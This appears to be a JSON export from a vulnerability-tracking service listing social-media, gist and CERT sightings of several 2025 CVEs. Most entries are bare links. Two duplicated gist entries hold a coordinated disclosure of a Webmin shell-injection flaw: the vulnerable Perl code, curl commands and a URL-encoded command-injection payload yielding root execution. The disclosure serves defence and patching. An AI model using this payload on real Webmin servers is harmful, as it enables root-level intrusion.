{"vulnerability": "cve-2025-6773", "sightings": [{"uuid": "9450c8fb-4ade-4659-a5d0-e06a137cca6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6773", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lsmju4fxyu23", "content": "", "creation_timestamp": "2025-06-27T20:59:28.502017Z"}, {"uuid": "7d714e5b-d088-437a-835d-c17d408121fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3mfpokjd67724", "content": "", "creation_timestamp": "2026-02-25T22:00:15.513849Z"}, {"uuid": "6c9969fe-df5b-4b74-8f9e-cd1991dae598", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67738", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m7p3jrohgb2e", "content": "", "creation_timestamp": "2025-12-11T07:48:39.656165Z"}, {"uuid": "89b627e5-2769-47c1-8897-cf97ce6077b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67739", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m7q4dryn6d2q", "content": "", "creation_timestamp": "2025-12-11T17:35:52.723951Z"}, {"uuid": "98016369-eca6-4fea-81fe-1b15b406a751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67731", "type": "seen", "source": "https://gist.github.com/Darkcrai86/2756abaaa1dcf5a53166979da1a694d9", "content": "", "creation_timestamp": "2025-12-12T08:08:01.000000Z"}, {"uuid": "fadc4c4c-2bd0-4401-8083-0ace0658f3c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67731", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m7rpzwwmwi2y", "content": "", "creation_timestamp": "2025-12-12T09:00:56.390230Z"}, {"uuid": "7c13e38e-17af-425e-b46a-109a44b895b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-67731", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/115705791154466416", "content": "", "creation_timestamp": "2025-12-12T09:04:22.282962Z"}, {"uuid": "45eaff25-7c04-4096-b339-fe027f5468d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-67731", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3m7rqa3lq3v2j", "content": "", "creation_timestamp": "2025-12-12T09:04:23.241041Z"}, {"uuid": "8d631052-6b7a-417f-adad-fcbf528125e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67731", "type": "seen", "source": "https://gist.github.com/Darkcrai86/4b054f05a9878828fd9c933d2824bb9d", "content": "", "creation_timestamp": "2025-12-12T09:37:38.000000Z"}, {"uuid": "35cade07-c488-4ce8-b0c0-efc6311b076a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3meqri7iqpx22", "content": "", "creation_timestamp": "2026-02-13T15:00:08.266637Z"}, {"uuid": "b04d37e1-43c2-4eb3-8a8e-fa7899d6a787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://mastodon.social/users/chrisvest/statuses/115724864576648010", "content": "", "creation_timestamp": "2025-12-15T17:55:00.956396Z"}, {"uuid": "41c72921-d727-4dc6-bab2-5ba611288ab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67736", "type": "seen", "source": "https://gist.github.com/Darkcrai86/eec9ae5d886ef54e3a0260ebc010b82a", "content": "", "creation_timestamp": "2025-12-16T07:44:09.000000Z"}, {"uuid": "5219fe3e-f451-4bac-9f3f-d5452a2b9e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67736", "type": "seen", "source": "https://gist.github.com/Darkcrai86/198164d7e69dfb12d84bf6acd9738029", "content": "", "creation_timestamp": "2025-12-16T08:02:15.000000Z"}, {"uuid": "9f7b2af2-aeb4-4a6f-963f-4716ddf883d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mfkimlakdt25", "content": "", "creation_timestamp": "2026-02-23T20:30:43.851105Z"}, {"uuid": "6e98ebf3-a0d8-4059-8460-2a0289165fa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mfkinnkzsp2c", "content": "", "creation_timestamp": "2026-02-23T20:31:19.649332Z"}, {"uuid": "9fbf73c8-f81f-4d66-98c1-82e88e0714c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mfkknzebdh24", "content": "", "creation_timestamp": "2026-02-23T21:07:19.411008Z"}, {"uuid": "ac7aa87b-bca9-4185-bfee-8716c7f483a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67732", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mbpopleedi2x", "content": "", "creation_timestamp": "2026-01-06T00:22:18.928214Z"}, {"uuid": "e7694207-4c39-439f-947a-48d85c0ffc3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mftuxb2hgv2v", "content": "", "creation_timestamp": "2026-02-27T14:05:24.796010Z"}, {"uuid": "d669ebc2-b3c8-48e7-bbf7-09c36a3a735d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67732", "type": "seen", "source": "https://bsky.app/profile/cyberdudebivash.bsky.social/post/3mbsm6sfymc2p", "content": "", "creation_timestamp": "2026-01-07T04:15:13.276925Z"}, {"uuid": "c9ca56bf-b022-49fe-83de-620775e5bbf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67730", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mc7ipgysnv2g", "content": "", "creation_timestamp": "2026-01-12T07:17:28.361950Z"}, {"uuid": "9e291ac5-d9e2-4516-a883-7d7f814c59c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1729", "content": "", "creation_timestamp": "2026-01-21T04:00:00.000000Z"}, {"uuid": "15f47b6d-17b8-4993-b802-fba77165c2dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mcctlphjie2i", "content": "", "creation_timestamp": "2026-01-13T15:10:13.096548Z"}, {"uuid": "fc1d02be-e037-4bb9-88e7-c2b706e12fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0315/", "content": "", "creation_timestamp": "2026-03-18T00:00:00.000000Z"}, {"uuid": "f9523d2f-aa13-4616-881b-56ccef1ff3bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mcx3sbyy2t2o", "content": "", "creation_timestamp": "2026-01-21T16:30:19.027634Z"}, {"uuid": "e96a38ff-f7d8-4e22-8ffc-6e4a970b614a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/bbcbc485-b88d-4831-b8e9-6e37e7bd9875", "content": "", "creation_timestamp": "2026-01-21T21:18:16.771453Z"}, {"uuid": "53290d48-ecc4-432e-81ae-06b6ff479c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67732", "type": "seen", "source": "Telegram/DM3pgu0_RzgLvzG-bb0EsBJeE-HNavxIR4FBWximsYdDyCg", "content": "", "creation_timestamp": "2026-01-05T23:05:27.000000Z"}, {"uuid": "28f8019e-dd20-4ce6-965a-bae657c20182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67730", "type": "published-proof-of-concept", "source": "Telegram/lAdyWIii7qOqzP25MDlOiugnGJyq509QFKqLPj04_1zA-jM", "content": "", "creation_timestamp": "2026-01-01T09:00:05.000000Z"}, {"uuid": "c309d02f-39d5-4cf7-9362-f5b80acf27fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-67735", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1833", "content": "", "creation_timestamp": "2026-04-21T21:00:00.000000Z"}, {"uuid": "47168d6d-7bdb-4062-bc88-3eaf9e1e480b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6773", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19779", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-6773\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X)\n\ud83d\udd39 Description: A vulnerability was found in HKUDS LightRAG up to 1.3.8. It has been declared as critical. Affected by this vulnerability is the function upload_to_input_dir of the file lightrag/api/routers/document_routes.py of the component File Upload. The manipulation of the argument file.filename leads to path traversal. It is possible to launch the attack on the local host. The identifier of the patch is 60777d535b719631680bcf5d0969bdef79ca4eaf. It is recommended to apply a patch to fix this issue.\n\ud83d\udccf Published: 2025-06-27T19:00:17.695Z\n\ud83d\udccf Modified: 2025-06-27T19:21:27.100Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.314089\n2. https://vuldb.com/?ctiid.314089\n3. https://vuldb.com/?submit.601276\n4. https://github.com/HKUDS/LightRAG/issues/1692\n5. https://github.com/HKUDS/LightRAG/issues/1692#issuecomment-3009368235\n6. https://github.com/HKUDS/LightRAG/commit/60777d535b719631680bcf5d0969bdef79ca4eaf", "creation_timestamp": "2025-06-27T19:52:02.000000Z"}, {"uuid": "2bf240b4-3e7f-4238-b6ea-9049a6d756b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67738", "type": "seen", "source": "https://gist.github.com/dohyun4455/0153f5bf20c868cd82dca3e99a9e70a4", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &backquote_command(\"$config{'man2html_path'} -v 2>&1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i && $1 >= 3) {\n    # New version uses a different syntax!\n    $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&sec=\\\\\\${section}&opts=$in{'opts'}\\\" --bare\";\n    $out = &backquote_command(\"$cmd 2>&1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html >=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl\n  # Install Webmin 2.641 ...\n  # Install Earl Hood man2html >=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n  # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&pass=ClassB!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] \"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` >=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-024 is the incomplete-coverage variant on the shell-injection axis (and the companion K-025 XSS is the incomplete-coverage variant on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:15.000000Z"}, {"uuid": "410b8334-1d4f-402d-bd24-e696cc9251f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67738", "type": "seen", "source": "https://gist.github.com/dohyun4455/3e6d2720295079f2315f3f87844c68b7", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &backquote_command(\"$config{'man2html_path'} -v 2>&1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i && $1 >= 3) {\n    # New version uses a different syntax!\n    $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&sec=\\\\\\${section}&opts=$in{'opts'}\\\" --bare\";\n    $out = &backquote_command(\"$cmd 2>&1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html >=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n  -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n  debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n  apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl\n  # Install Webmin 2.641 ...\n  # Install Earl Hood man2html >=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n  # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&pass=ClassB!2026\" \\\n  https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n  \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] \"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` >=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n  - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n  - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant on the shell-injection axis (a companion reflected XSS finding in the legacy `man2html` branch of the same file is the corresponding gap on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:44.000000Z"}, {"uuid": "52d71c03-6609-4912-becf-aa2790218bc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5cg6627k2c", "content": "Redis has two critical CVEs (CVE-2025-67733 & CVE-2026-21863) on Debian. Here is your practical guide: check your version, apply the fix, or mitigate with ACLs and iptables.  Read more -> tinyurl.com/3kzpbaj7  #Debiar #Security", "creation_timestamp": "2026-05-18T16:31:41.745705Z"}, {"uuid": "a7114b62-396c-47ee-b2e1-5b6f54daa32e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5cgbfax22c", "content": "Redis has two critical CVEs (CVE-2025-67733 & CVE-2026-21863) on Debian. Here is your practical guide: check your version, apply the fix, or mitigate with ACLs and iptables.  Read more -> tinyurl.com/3kzpbaj7  #Debiar #Security", "creation_timestamp": "2026-05-18T16:31:42.501007Z"}, {"uuid": "a1fa30e9-d2a0-4569-b6f6-931b7c841613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-67733", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5cgf5cqk2c", "content": "Redis has two critical CVEs (CVE-2025-67733 & CVE-2026-21863) on Debian. Here is your practical guide: check your version, apply the fix, or mitigate with ACLs and iptables.  Read more -> tinyurl.com/3kzpbaj7  #Debiar #Security", "creation_timestamp": "2026-05-18T16:31:43.171457Z"}, {"uuid": "f7b30bfc-d4b9-48e8-84a3-997faaee2254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-67735", "type": "published-proof-of-concept", "source": "https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4", "content": "", "creation_timestamp": "2025-12-15T14:39:48.000000Z"}]}